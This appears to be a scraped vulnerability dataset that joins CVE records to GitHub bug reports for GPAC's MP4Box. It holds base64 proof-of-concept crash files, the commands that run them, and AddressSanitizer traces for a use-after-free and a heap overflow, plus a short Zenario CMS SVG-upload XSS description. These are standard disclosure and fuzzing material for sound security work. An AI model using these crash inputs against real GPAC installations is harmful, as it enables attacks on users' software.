AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/+MAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAuAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA0rJXuzhGhTOYseF9zokq8wfhSgACAF+UigKfsL4pIlJVT///+HpgAsLJC5ZKqWT24B mHsqlMWq1K+tB8QAmkTpMWst/PLfoMPyHC0j4RLiZYW7wAGApDbvyM5cAScBC1vH0MeAAOAACQAA AAECAAQFAAAABwAAAAAAAQABAAEAAAAAAAAA4AAKAAAAAQIAEV8AAAAIAAAAAAABAAEAAgAAAAAA AABgAAsAAAABAgAFtAAAAAkAAOAADAAAAAECAAHHAAAACQAABbQAAQABAAIAAAAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgAAAAAGAADQAAAAECAAW0AAAACgAAAAAAAQABAAAA AADgAA4AAAABAgABowAAAAoAAAW0AAEAAQACAAAQAAAAAGAADxAAAAECAAW0AAAACwAAAAAAAQAB AAAAAADgABAAAAABAgAFVAAAAAsAAAW0AAESAQADAAAAAAAAHWAAEQAAAAECAAW0AAAADAAAAAAA AQABAAAAAABgABIAAAABAgAFtAAAAAwAAAW0AAGRASAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICDgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgIB8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAIgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg/yAgICAgICAgICAgICAgICAgICAgIAsgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICDMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMwAAAAAzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMwAAABkzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMwgICDMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMDMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEPMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzczMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM zMzMzMzMzMzMzMzMzMzMzMzMzBAQLN0vjAJ86nCLxbiv934OHu6SjG47B8ELADJqdIimDn8wAEwC ZIe2yLfTFC6L+9YhF5an8khK0aHaA1YGcLfqs8y4BBQKQSgPBuSqIXrIwAhDHJmnC48ktYyx4jt9 cACDsFM2VOEAtXMbUAt/Y2QCAsDGUHVgfwBABDBHcZTMEQ0rJXuzhGhTOYsehgZV009r+ADFpH6r EvwiF9zokq8wfhSgACAF+UigKfsL4pKAAAAA//+HpgAsLJC5ZKqWT24BmHsULov71iEXlqfySErR odoDVgZwt+qzzLgEFApBKA8G5KohesjACEMcmacLjyS1jLHiQH1wAIOwUzZU4QC1//9QC39jZAIC wMZQdWB/AEAEMEdxlMwRDSsle7OEaFM5ix6GBlXTT2v4Km3F16ood/+/yBDE8iI2ybzydDgLmhLU nKTEDk8HceAAQJCy0AAAAAAAAQII4AAAAAAAAAAAAAAAAAECCHAAAAAAAAAAAAAAAAABAgjQAAAA AAAAAAAAAAAAAQII8AAAAAAAAAAAAAAAAAECCPAiAAAAAAAAAAAA3gACAAEcAAAAEAAAAAAAAQAB AgABDgAAABEAAAAAAAEAAQIAARoAAAASAAAAAAABAAECAAEeAAAAEwAAAAAAAQABAgABHgAAABQA AAAAAAEAAQABIgAAAAAAAOEABAAAAAsBAgBQAAAAAAAAAAAAAAAAAQIIwABXI8YCZntjZiCI/Amg AACAXAAAEBfAcAAQRQABBmAAEFMAJJgAsIhx1oKKQ8T9JLeYAAIDgAAgTgACAEBVM4ADQABAEAFa UoCQ2gUlAw+p9XB4BA5Ch7zJRGmVnUdZhhxW+4a4Yn4AATGUAGBrjLkZhCYDFOi+ECbZLAAD95oh cCzqoS4MABjpeUiNSMSs///P5C1QgAAgG9d7YDSVxjwgFYpLsCilC2FJ9X4AAQHHyUs05YyB9KKG yd94DEXigEjyuWqvpp6qa6EIpxSmGKdVvb+/uwy+yABwWB0gKGVdWnR+vC9YTuUMPLz/4S+QCYwD GJGPYSRJgPpwvBQ8AQAAUCJAGgCOIGoC4g6oEgCHcR0uKW01uQj5DGJf/wlDAEAAFQiABgAjiBod 0HUHgYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJ iYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJ CCIAAIeqkOAAIIoAAh6AACGiggAEkADBCZtRCyCXfYCbYgOMN4jYXYPFbCGP9QNPgggCDAB2oYOU IqW7KJWxL/K9ORppaCBDcbgijqRBNlJ7AfAAIhIxn1v+FkXyGPgA8MFGIACIMoiHEmmpIFIKqoAm DFwAHwABAAMAeQWn7dQ8fAhSSdsZoCgB3pVwFVd5M75uAJ5zgiFh629FyD0YeEnUHnRbFu4gGbhF DH//CCHgAMmQ0AA6UX7AAoC9Jl4wRBSy2DFsJl1XHFYY/8A1OFf5gLR/AJvTIHGA2vIPfSMAAQHt L4ADjZiXwg1jAMQO0utAI1kn/e9NPI5GmlDHgH9eFMABGGQUhqTDUEC0FVEIIUAB4wIBCYYHvgAU TT9lpX++IEzAilOHKhezT5WTwx/un8EHAcFRhi0gpAgUIX4AQxf837BcSglcnwYIhhfElII4VVIN eeHBgMYBl8L+AHgAQAKBIgxDIrlaCG2qH1AAIFyLwABAAAGnoZk6PpF76CAIGHCLArKxCoMgxDub tePuxmAAgKZWNLYaZffhgLtJqpANLgSkAGAAxM2gEUbQMz/9/DYIP0Vr6xHu3//aAGcBVonoUYE2 EDrcGKETuyhwq54AIMvqLF6N5LOLYLq+gEHJ/CI3K8JmkVkA84AIYTtJJlJB1YWeKA4ZOsBFIeMA AIgMErJnJ4KwWggXlqiJG60AAIANwAGA4GyOFkMFtyUkAMTkiSGBb6GBcinMqfvoAIAc3AzllocA VahU4f9/QOH6ABVBsS54MI2H+WEQQh0YYxyMP/3+h+EqfgAIA0xCsmThAyJcAAYBRC5Rfs7IMbCz NL+D8CFVC+uelQ+jj7QcBTFYk36mL+GcLd/4OHAARBiiltZbNrlhbZWvTQwdERAQLN0vjAJ86nCL xbiv934OHu6SjG47B8ELICAgICAgICAgICAgICAgICAgICAgICAgF5an8khK0aHaA1YGcLfqs8y4 BBQKQSgPBuSqIXrIwAhDHJmnC48ktYyx4jt9cACDsFM2VOEAtXMbUAt/Y2QCAsDGUHVgfwBABDBH cZTMEQ0rJXuzhGhTOYsehgZV009r+ADFpH6rEvwiF9zokq8wfhSgACAF+UigKfsL4pKAAAAA//+H pgAsLJC5ZKqWT24BmHsqbcXXqih3/7/IEMTyIjbJvPJ0OAuaEtScpMQOTwdx4ABAkLLQAAAAAAAB AgjgAAAAAAAAAAAAAAAAAQIIcAAAABkAAAAAtX47bY1L3o6bqa8TVBwyjJicR+5OX83g6lmsCGu2 1TfjAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAOUBAXBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBw cHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcHBwcA== command: ./MP4Box -lsr poc Result ~/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box -lsr poc [iso file] Unknown box type dCCf in parent minf [iso file] Missing DataInformationBox [iso file] extra box maxr found in hinf, deleting [iso file] Box "rtp " (start 9955) has 7 extra bytes [iso file] Box "stsd" (start 9939) has 5 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Unknown box type dCCf in parent minf [iso file] Missing DataInformationBox [iso file] extra box maxr found in hinf, deleting [iso file] Box "rtp " (start 9955) has 7 extra bytes [iso file] Box "stsd" (start 9939) has 5 extra bytes [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [ODF] Reading bifs config: shift in sizes (not supported) [BIFS] name too long 1475 bytes but max size 1000, truncating ================================================================= ==3330624==ERROR: AddressSanitizer: heap-use-after-free on address 0x610000000494 at pc 0x7fa720afa77d bp 0x7fffca7618d0 sp 0x7fffca7618c8 READ of size 4 at 0x610000000494 thread T0 #0 0x7fa720afa77c in Q_IsTypeOn /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/unquantize.c:151:12 #1 0x7fa720afe187 in gf_bifs_dec_unquant_field /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/unquantize.c:397:7 #2 0x7fa720ab6d21 in gf_bifs_dec_sf_field /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:84:7 #3 0x7fa720ac040e in gf_bifs_dec_field /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:517:7 #4 0x7fa720ac137d in gf_bifs_dec_node_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:618:7 #5 0x7fa720abcdb3 in gf_bifs_dec_node /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/field_decode.c:920:7 #6 0x7fa720a96880 in gf_bifs_dec_proto_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1143:12 #7 0x7fa720a98391 in BD_DecSceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1351:6 #8 0x7fa720ad66b6 in BM_SceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:860:21 #9 0x7fa720ad6ff7 in BM_ParseCommand /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:910:8 #10 0x7fa720ad76ee in gf_bifs_flush_command_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:951:9 #11 0x7fa720a96969 in gf_bifs_dec_proto_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1162:5 #12 0x7fa720a96070 in gf_bifs_dec_proto_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1132:8 #13 0x7fa720a98391 in BD_DecSceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/com_dec.c:1351:6 #14 0x7fa720ad66b6 in BM_SceneReplace /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:860:21 #15 0x7fa720ad6ff7 in BM_ParseCommand /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:910:8 #16 0x7fa720ad852e in gf_bifs_decode_command_list /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/memory_decoder.c:1019:6 #17 0x7fa72127c2df in gf_sm_load_run_isom /home/aidai/fuzzing/gpac/gpac-asan/src/scene_manager/loader_isom.c:303:10 #18 0x7fa7212000fe in gf_sm_load_run /home/aidai/fuzzing/gpac/gpac-asan/src/scene_manager/scene_manager.c:719:28 #19 0x51cdb8 in dump_isom_scene /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/filedump.c:203:14 #20 0x5004b4 in mp4boxMain /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/main.c:6146:7 #21 0x7fa71fdd50b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #22 0x429b7d in _start (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x429b7d) 0x610000000494 is located 84 bytes inside of 192-byte region [0x610000000440,0x610000000500) freed by thread T0 here: #0 0x4a203d in free (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x4a203d) #1 0x7fa7206f69dc in gf_node_free /home/aidai/fuzzing/gpac/gpac-asan/src/scenegraph/base_scenegraph.c:1620:2 previously allocated by thread T0 here: #0 0x4a22bd in malloc (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x4a22bd) #1 0x7fa72072195c in QuantizationParameter_Create /home/aidai/fuzzing/gpac/gpac-asan/src/scenegraph/mpeg4_nodes.c:12496:2 SUMMARY: AddressSanitizer: heap-use-after-free /home/aidai/fuzzing/gpac/gpac-asan/src/bifs/unquantize.c:151:12 in Q_IsTypeOn Shadow bytes around the buggy address: 0x0c207fff8040: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8050: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 0x0c207fff8060: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c207fff8070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c207fff8080: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd =>0x0c207fff8090: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c207fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c207fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==3330624==ABORTING ```
Use After Free
https://api.github.com/repos/gpac/gpac/issues/2058/comments
1
2022-01-21T08:54:48Z
2022-01-21T11:26:56Z
https://github.com/gpac/gpac/issues/2058
1,110,211,366
2,058
3,338
CVE-2022-24576
2022-03-14T14:15:07.877
GPAC 1.0.1 is affected by Use After Free through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2061" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/011ac07c-6139-4f43-b745-424143e60ac7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2061" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/011ac07c-6139-4f43-b745-424143e60ac7/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/2061
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1646-gddd7990bb-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/home/aidai/fuzzing/gpac/ Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz poc base64 poc //7/AGUKCio= command: ./MP4Box -info poc Result ================================================================= ==1529455==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001a1a at pc 0x00000043e343 bp 0x7ffeafafa9a0 sp 0x7ffeafafa158 READ of size 11 at 0x602000001a1a thread T0 #0 0x43e342 in StrstrCheck(void*, char*, char const*, char const*) (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e342) #1 0x43e171 in strstr (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e171) #2 0x7f61341e32d7 in ctxload_probe_data /home/aidai/fuzzing/gpac/gpac-asan/src/filters/load_bt_xmt.c:837:6 #3 0x7f6134037b52 in gf_filter_pid_raw_new /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter.c:3777:13 #4 0x7f6134153a31 in filein_process /home/aidai/fuzzing/gpac/gpac-asan/src/filters/in_file.c:481:7 #5 0x7f6134030e3a in gf_filter_process_task /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter.c:2515:7 #6 0x7f613401015f in gf_fs_thread_proc /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter_session.c:1756:3 #7 0x7f613400de3e in gf_fs_run /home/aidai/fuzzing/gpac/gpac-asan/src/filter_core/filter_session.c:2000:2 #8 0x7f6133c4d27e in gf_media_import /home/aidai/fuzzing/gpac/gpac-asan/src/media_tools/media_import.c:1218:3 #9 0x524fe4 in convert_file_info /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/fileimport.c:128:6 #10 0x4f45c2 in mp4boxMain /home/aidai/fuzzing/gpac/gpac-asan/applications/mp4box/main.c:6063:6 #11 0x7f61332740b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #12 0x429b7d in _start (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x429b7d) 0x602000001a1a is located 0 bytes to the right of 10-byte region [0x602000001a10,0x602000001a1a) allocated by thread T0 here: #0 0x4a22bd in malloc (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x4a22bd) #1 0x7f613372a4fb in gf_utf_get_utf8_string_from_bom /home/aidai/fuzzing/gpac/gpac-asan/src/utils/utf.c:680:14 SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/aidai/fuzzing/gpac/gpac-asan/bin/gcc/MP4Box+0x43e342) in StrstrCheck(void*, char*, char const*, char const*) Shadow bytes around the buggy address: 0x0c047fff82f0: fa fa 00 00 fa fa 04 fa fa fa 04 fa fa fa 00 00 0x0c047fff8300: fa fa 00 00 fa fa 04 fa fa fa 00 00 fa fa 06 fa 0x0c047fff8310: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8320: fa fa 00 00 fa fa fd fa fa fa 00 00 fa fa 00 00 0x0c047fff8330: fa fa 04 fa fa fa 04 fa fa fa 04 fa fa fa fd fd =>0x0c047fff8340: fa fa 00[02]fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8390: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1529455==ABORTING ```
Heap-based Buffer Overflow
https://api.github.com/repos/gpac/gpac/issues/2061/comments
0
2022-01-21T08:56:18Z
2022-01-21T11:26:35Z
https://github.com/gpac/gpac/issues/2061
1,110,212,655
2,061
3,339
CVE-2021-41952
2022-03-14T15:15:09.287
Zenario CMS 9.0.54156 is vulnerable to Cross Site Scripting (XSS) via upload file to *.SVG. An attacker can send malicious files to victims and steals victim's cookie leads to account takeover. The person viewing the image of a contact can be victim of XSS.
